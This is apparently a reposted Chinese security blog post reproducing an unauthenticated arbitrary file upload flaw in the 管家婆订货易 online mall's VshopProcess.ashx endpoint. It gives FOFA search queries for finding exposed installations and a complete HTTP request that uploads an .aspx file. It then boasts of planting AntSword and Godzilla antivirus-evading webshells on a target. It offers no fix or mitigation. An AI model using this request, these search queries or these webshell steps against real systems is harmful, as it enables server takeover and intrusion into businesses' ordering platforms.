一、产品简介
管家婆订货易,帮助传统企业构建专属的订货平台,PC+微信+APP+小程序+h5商城5网合一,无缝对接线下的管家婆ERP系统Q,让用户订货更高效。支持业务员代客下单,支持多级推客分销,以客带客,拓展渠道。让企业的生意更轻松。
二、漏洞概述
管家婆订货易在线商城VshooProcess.ashx接口处存在任意文件上传漏洞,未经身份认证的攻击者可以通过该漏洞,上传恶意后门文件深入利用可造成代码执行和服务器失陷。
三、复现环境
FOFA
title="订货易"||title="管家婆分销ERP" || body="管家婆分销ERP" || body="ERP V3"
四、漏洞验证
POST /API/VshopProcess.ashx?action=PostFileImg HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/57.0.578.100 Safari/537.36Accept-Encoding: gzipConnection: closeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytCOFhbEjc3IfYaY5------WebKitFormBoundarytCOFhbEjc3IfYaY5Content-Disposition: form-data; name="fileup1i"; filename="a.aspx"Content-Type: image/jpeg<% Response.Write("Test"); %>------WebKitFormBoundarytCOFhbEjc3IfYaY5--
访问回显地址
漏洞验证成功
五、漏洞攻击
小龙又要开始整活了
先来一招一发入魂【依法入狱】
轻松
直接访问解析是否成功
空白页,基本可以判断成功
然后肯定不废话了,直接上蚁剑
哎哟我去,翻车了?小马好像失败了?被拦截过滤了好像,就这么算了?
不可能,绝对不可能!
直接上哥斯拉免杀ASPX马子!!!
上线!!解析
搞定
龙哥做事,向来从
原文始发于微信公众号(暗影网安实验室):管家婆订货易在线商城 VshopProcess 任意文件上传漏洞复现【哥斯拉蚁剑齐上阵】
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论